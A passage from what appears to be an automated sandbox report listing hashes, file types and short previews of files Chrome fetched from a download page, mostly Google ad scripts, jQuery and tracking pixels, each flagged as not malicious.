                                                                                                                                                                                                                                                                                                                      SHA-256:6F3CBDF113BDAEA88BD32F52AA0F2A120D5615A1609F256C13809A0744841F0B
                                                                                                                                                                                                                                                                                                                      SHA-512:97736BC7BFF3FBF66001693CEF230E2B20CF9C4E1B98723D77CD4B8F38E3E88907D111C3558AA12D7556690C601685EB25E0C60E80711305967A172196FA919F
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://googleads.g.doubleclick.net/pagead/ads?gdpr=0&client=ca-pub-9495854422341365&output=html&h=465&slotname=5441991148&adk=1388703591&adf=2999106894&pi=t.ma~as.5441991148&w=930&abgtt=6&cr_col=4&cr_row=2&fwrn=2&lmt=1730398767&rafmt=9&format=930x465&url=https%3A%2F%2Ftrksyln.net%2FError&crui=image_stacked&fwr=0&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1730398765225&bpp=22&bdt=3876&idt=2066&shv=r20241028&mjsv=m202410240101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=0x0&nras=1&correlator=5363632696827&frm=20&pv=1&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=44&ady=909&biw=1017&bih=870&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C31088482%2C95344187%2C95335245%2C95345472%2C95345789%2C95345963%2C95345966&oid=2&pvsid=2973902258960805&tmod=55193809&uas=0&nvt=1&ref=https%3A%2F%2Ftrksyln.net%2Ftgmacro%2Fdownload&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7CeEbr%7C&abl=CS&pfx=0&fu=128&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=2&uci=a!2&btvi=1&fsb=1&dtd=2073
                                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html lang=en><head><meta charset="UTF-8"><link rel="preload" href="https://www.gstatic.com/mysidia/35f2dd7cdd8ea7bef7dd50fca553a4a9.js?tag=engine/client_fast/client_fast_engine" as="script"><script>var jscVersion = 'r20241028';</script><script>var google_casm=[];</script><style>HTML,BODY{height:100%;width:100%;margin:0;padding:0;overflow:hidden;}#mys-wrapper{height: 100%;width:100%;overflow:hidden;position: absolute;top:0;left:0;align-items: flex-start;display:flex;justify-content:center;line-height:normal;}#mys-overlay{height:100%;width:100%;overflow:hidden;position:absolute;top:0;left:0;box-sizing:border-box;pointer-events:none;z-index:1;display:none;}.mys-wrapper A,.mys-wrapper A:visited,.mys-wrapper A:hover,.mys-wrapper A:active{color:inherit;cursor:pointer;text-decoration:inherit;}[dir=rtl] .flip-on-rtl{transform:scale(-1,1);transform-origin:center;}#mys-content{flex-shrink:0;position:relative;overflow:hidden;z-index:0;}</style><script data-jc="36" data-jc-version=
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (2008)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):13020
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.338335125035746
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:192:pl/66sGOASROqI3wgh5MXnYY9EAhMmK3qzfaGxCLLgIJQaYmx:rnsGN6JIVs3LLK3qzf6gIZYmx
                                                                                                                                                                                                                                                                                                                      MD5:D1F231B50B152372A6C3100F4AED1973
                                                                                                                                                                                                                                                                                                                      SHA1:1BF10951BE06DA03D1371A904E19C0419F2A3637
                                                                                                                                                                                                                                                                                                                      SHA-256:9DEC95894AF322B087AB6E87F9C8CE66D849646CF33B375D33C957F4569ED081
                                                                                                                                                                                                                                                                                                                      SHA-512:00093B7FC4AFFA2D2230622F5D7DA69730246B74620AD4DE30AC64E41FB9AC927AFD2AB426034D71DC85A3DFEE9A46E73DF48DA7E2636A54579EA9AAAC4CAFF6
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://ep2.adtrafficquality.google/sodar/sodar2/232/runner.html
                                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>.<meta charset=utf-8><script>.(function(){'use strict';function m(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var p=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function aa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var r=aa(this),u=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",v={},w={};function x(a,b,c){if(!c||a!=null){c=w[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function y(a,b,c){if(b)a:{var e=a.split(".");a=e.length===1;var f=e[0],h;!a&&f in v?h=v:h=r;for(f=0;f<e.length-1;f++){var d=e[f];if(!(d in h))break a;h=h[d]}e=e[e.length-1];c=u&&c==="es6"?h[e]:null;b=b(c);b!=null&&(a?p(v,e,{config
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):87533
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.262536918435756
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKr:sHNwcv9VBQpLl88SMBQ47GKr
                                                                                                                                                                                                                                                                                                                      MD5:2C872DBE60F4BA70FB85356113D8B35E
                                                                                                                                                                                                                                                                                                                      SHA1:EE48592D1FFF952FCF06CE0B666ED4785493AFDC
                                                                                                                                                                                                                                                                                                                      SHA-256:FC9A93DD241F6B045CBFF0481CF4E1901BECD0E12FB45166A8F17F95823F0B1A
                                                                                                                                                                                                                                                                                                                      SHA-512:BF6089ED4698CB8270A8B0C8AD9508FF886A7A842278E98064D5C1790CA3A36D5D69D9F047EF196882554FC104DA2C88EB5395F1EE8CF0F3F6FF8869408350FE
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://code.jquery.com/jquery-3.7.1.min.js
                                                                                                                                                                                                                                                                                                                      Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3673)
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):167093
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.605068543657521
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:xOWww+JsoKGFDisDc1MO3FC/lAVPrNoG8Uiqug9R9a7lAXmjuGSndT5RQRiWf:xOWwwboKGFDisDc1MO3w9yrNoGriqJ9i
                                                                                                                                                                                                                                                                                                                      MD5:4A6B61172746935722EE074D3F0ECA16
                                                                                                                                                                                                                                                                                                                      SHA1:8BB7775710EB21DE3416A3C2C5DA7F5D2E883E70
                                                                                                                                                                                                                                                                                                                      SHA-256:975A1DFD84BF06CC6D0A2021BDABE3EACD69098D6FECE654875E8FB4C329435E
                                                                                                                                                                                                                                                                                                                      SHA-512:14421A26CA7FEBF9683DEF1E5CB956CC26446E2FDC8AB5CCC35DD1B1E02A93C4700511C959EA057DE16A8DA6C0F6086B0D32082B422E635D0DB627AB25BD8A7E
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9495854422341365
                                                                                                                                                                                                                                                                                                                      Preview:(function(sttc){'use strict';var aa,ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",fa={},ha={};function ia(a,b,c){if(!c||a!=null){c=ha[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ja(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in fa?f=fa:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=ea&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?ba(fa,d,{configurable:!0,writable:!0,value:b}):b!==c&&(ha[d]===void 0&&(a=Math.random()*1E9>>>0,ha[d]=ea?da.Symbol(d):"$jscp$"+a+
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):42
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.0241026136709444
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQEsJ+q:1QEsJ+q
                                                                                                                                                                                                                                                                                                                      MD5:32023BB33CFB2A1990A4EF2D85B6AC16
                                                                                                                                                                                                                                                                                                                      SHA1:23DCC6D4B5BFE00357FD0248BB5955B8E36BB8F1
                                                                                                                                                                                                                                                                                                                      SHA-256:99C2917EE5B2A01459A923BDD1C676F15EE73B62B87F696E6735312D26F51E12
                                                                                                                                                                                                                                                                                                                      SHA-512:D052ECEC2839340876EB57247CFC2E777DD7F2E868DC37CD3F3F740C8DEB94917A0C9F2A4FC8229987A0B91B04726DE2D1E9F6BCBE3F9BEF0E4B7E0D7F65EA12
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L.;
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=309242622&google_hm=42792e3cde3b100032f83ab40466
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):42
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                      MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                      SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                      SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                      SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjsukzXYtKgQwzqdkYcHscfxpATW6iBfCCn4wS1iudB-Krvzmf_rqZV4DHoRYbtFcbX2unbNTik5xBE7KxqiYcDsxx3iSYcdBzryJCScB3hPajo-2WbXIIbt8OsyT0qYUDlqUX8gToSa6Z-bad2cbhecekMx1C9OWCk-x_-Be&sai=AMfl-YQcRPnfb5tUZcWvAz3nVj177aVLWRi64hrpF80c8G2vGrsRcfUM4jTxZbDsjvAFE7rYKYtSPJZYCIyxEelbeSJj4_Pg_oRF9wjlQRt8ffEeBKwBbPoNrv6Eh1Ou&sig=Cg0ArKJSzFcs4knwi8veEAE&cid=CAQSPACa7L7dvOfHXQ8tNna9MeQrnXaTBxJSGZXlWkRz7nq8OEQNAS3jbkB4vISvBnDrwSJ9Ewa8LSQ51hv0XxgB&id=lidar2&mcvt=1003&p=0,0,124,1005&tm=2727&tu=1724.1000000000058&mtos=1003,1003,1003,1003,1003&tos=1003,0,0,0,0&v=20241030&bin=7&avms=nio&bs=0,0&mc=1&if=1&vu=1&app=0&itpl=4&adk=1812271801&rs=2&la=0&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0%3D&vs=4&r=v&co=2633157300&rst=1730398773126&rpt=2278&met=mue&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
                                                                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://cm.g.doubleclick.net/pixel?google_nid=beeswaxio&google_sc=&google_hm=QUFDOUVFN09SNVFBQUJRUkRLV1VFdw&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof&bee_sync_partners=&bee_sync_current_partner=adx&bee_sync_hop_count=1
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):170
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                      MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                      SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                      SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                      SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 1200 x 628, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                      Size (bytes):42251
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.951768521989965
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:768:+JpQfb72PXOQ11kDIbUAE9T6IH7L1dNZiA6/icH8ptiay:+Kbm0DIPE92IbL1PQZcpW
                                                                                                                                                                                                                                                                                                                      MD5:EF3F0CA25DE1F5F3BD96A74B1C172D84
                                                                                                                                                                                                                                                                                                                      SHA1:127E9ED66FC8EF63DB4B813B50BC7F3ADC3EFB93
                                                                                                                                                                                                                                                                                                                      SHA-256:E67D373F58E4CE21BA50E28CB693009364D400F7F85C5472C76BA7AC2CBDF726
                                                                                                                                                                                                                                                                                                                      SHA-512:3BF72370C4ED45B588C92AB243626987660D3B3A0AE5079038E72D8B9C9ECF7BEB7339565388900348BCD7EED4AF63C7E27DEEF10123895D45DA8F1F3B33ED11
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      URL:https://tpc.googlesyndication.com/simgad/6532318905545041031/14763004658117789537
                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......t.....5V*e....PLTE..............................................................i..r..........}..f......Y..............`....!g..r..........2.........l.............p.K...n..[..R..x.....b.~..O...U..}..x..^..\..s........j..z..T..e..\........I.v.........b....T..Z...s.^..l.........U....._....3.....t..l.._..0|.}......f..I..:.....l..E.......9..b..?u..R....._.........|...........x.]..k.......z..]..b......u.r1.. .IDATx....6..-."...(ucI.%.%EL.Y....o[7v...g..........?..9.H..%J.-'>....-. H|yppp..H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2735)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):24842
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.536285587605039
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:768:n7xrC/PnLU3EEz0d0Pe49cg/8USqro7Zii4kTIKaJmmUQeG:s7w1pEcK1GmtG
                                                                                                                                                                                                                                                                                                                      MD5:C1BE04166BF406D39CBDF416DBC727EB
                                                                                                                                                                                                                                                                                                                      SHA1:5160F6ACF663F376BFB6CD1CAA38F18BA43E8C8A
                                                                                                                                                                                                                                                                                                                      SHA-256:C584101707A4CBEB1449B2CACB97E75453B6A9CBFF4795B8A6CD89DD555A639D
                                                                                                                                                                                                                                                                                                                      SHA-512:00A987E8621869C7063E6AD44E290AFA6C50E24640280938172D20BC19B44B543D6FA150C707EE487F69DD9A197C3F328B8E8765EA60BB147E430CAD97C49D5D
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var q=this||self;function aa(a){q.setTimeout(()=>{throw a;},0)};var ba,ca;a:{for(var da=["CLOSURE_FLAGS"],ea=q,fa=0;fa<da.length;fa++)if(ea=ea[da[fa]],ea==null){ca=null;break a}ca=ea}var ha=ca&&ca[610401301];ba=ha!=null?ha:!1;var r;const ia=q.navigator;r=ia?ia.userAgentData||null:null;function ka(a){return ba?r?r.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function y(a){var b;a:{if(b=q.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function A(){return ba?!!r&&r.brands.length>0:!1}function la(){return A()?ka("Chromium"):(y("Chrome")||y("CriOS"))&&!(A()?0:y("Edge"))||y("Silk")};function ma(a){ma[" "](a);return a}ma[" "]=function(){};!y("Android")||la();la();y("Safari")&&(la()||(A()?0:y("Coast"))||(A()?0:y("Opera"))||(A()?0:y("Edge"))||(A()?ka("Microsoft Edge"):y("Edg/"))||A()&&ka("Opera"));let na;function pa(){const a=Error();a.__closure__error__context__
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1382)
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):17945
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.330388445341784
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:384:AbnElW+CdYyqBFy9G/JtCHAOgRImVWsc5JZB:Ll3CdnqC9ct2A1ImVWsc5h
                                                                                                                                                                                                                                                                                                                      MD5:3B071D5606CC1CF92AE307F5BDB4E540
                                                                                                                                                                                                                                                                                                                      SHA1:E191068CC90E5489130489A1CF173FE50BBA28B8
                                                                                                                                                                                                                                                                                                                      SHA-256:FF3DE130872FE0FB5B770DFA2BC9F0DAF8AB320403A34A60D089436F08D24F99
